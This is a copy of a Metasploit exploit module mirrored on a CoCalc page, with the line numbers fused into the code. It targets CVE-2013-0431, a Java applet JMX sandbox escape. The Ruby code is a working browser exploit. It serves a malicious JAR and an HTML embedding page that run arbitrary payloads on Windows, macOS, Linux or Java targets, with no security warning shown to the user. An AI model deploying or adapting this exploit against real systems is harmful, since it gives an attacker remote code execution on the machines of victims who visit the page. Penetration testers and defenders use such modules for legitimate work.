CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/multi/browser/java_jre17_jmxbean_2.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpServer::HTML9include Msf::Exploit::EXE1011#include Msf::Exploit::Remote::BrowserAutopwn12#autopwn_info({ :javascript => false })1314def initialize( info = {} )1516super( update_info( info,17'Name' => 'Java Applet JMX Remote Code Execution',18'Description' => %q{19This module abuses the JMX classes from a Java Applet to run arbitrary Java code20outside of the sandbox as exploited in the wild in February of 2013. Additionally,21this module bypasses default security settings introduced in Java 7 Update 10 to run22unsigned applet without displaying any warning to the user.23},24'License' => MSF_LICENSE,25'Author' =>26[27'Unknown', # Vulnerability discovery and exploit in the wild28'Adam Gowdiak', # Vulnerability discovery29'SecurityObscurity', # Exploit analysis and deobfuscation30'juan vazquez' # Metasploit module31],32'References' =>33[34[ 'CVE', '2013-0431' ],35[ 'OSVDB', '89613' ],36[ 'BID', '57726' ],37[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-8.pdf' ],38[ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-9.pdf' ],39[ 'URL', 'http://security-obscurity.blogspot.com.es/2013/01/about-new-java-0-day-vulnerability.html' ],40[ 'URL', 'http://pastebin.com/QWU1rqjf' ],41[ 'URL', 'http://malware.dontneedcoffee.com/2013/02/cve-2013-0431-java-17-update-11.html' ]42],43'Platform' => %w{ java linux osx win },44'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },45'Targets' =>46[47[ 'Generic (Java Payload)',48{49'Platform' => ['java'],50'Arch' => ARCH_JAVA,51}52],53[ 'Windows x86 (Native Payload)',54{55'Platform' => 'win',56'Arch' => ARCH_X86,57}58],59[ 'Mac OS X x86 (Native Payload)',60{61'Platform' => 'osx',62'Arch' => ARCH_X86,63}64],65[ 'Linux x86 (Native Payload)',66{67'Platform' => 'linux',68'Arch' => ARCH_X86,69}70],71],72'DefaultTarget' => 0,73'DisclosureDate' => '2013-01-19'74))75end7677def on_request_uri(cli, request)78print_status("handling request for #{request.uri}")7980case request.uri81when /\.jar$/i82print_status("Sending JAR")83send_response( cli, generate_jar, { 'Content-Type' => "application/octet-stream" } )84when /\/$/85print_status("Sending HTML")86send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' })87else88send_redirect(cli, get_resource() + '/', '')89end90end9192def generate_jar93paths = [94[ "Exploit.ser" ],95[ "Exploit.class" ],96[ "B.class" ]97]9899p = regenerate_payload(cli)100101jar = p.encoded_jar102103paths.each do |path|1041.upto(path.length - 1) do |idx|105full = path[0,idx].join("/") + "/"106if !(jar.entries.map{|e|e.name}.include?(full))107jar.add_file(full, '')108end109end110fd = File.open(File.join( Msf::Config.data_directory, "exploits", "cve-2013-0431", path ), "rb")111data = fd.read(fd.stat.size)112jar.add_file(path.join("/"), data)113fd.close114end115return jar.pack116end117118def generate_html119html = <<-EOF120<html>121<script language="Javascript">122123var _app = navigator.appName;124125if (_app == 'Microsoft Internet Explorer') {126document.write('<applet archive="#{rand_text_alpha(4+rand(4))}.jar" object="Exploit.ser"></applet>');127} else {128document.write('<embed object="Exploit.ser" type="application/x-java-applet;version=1.6" archive="#{rand_text_alpha(4+rand(4))}.jar"></embed>');129}130131</script>132</html>133EOF134return html135end136end137138139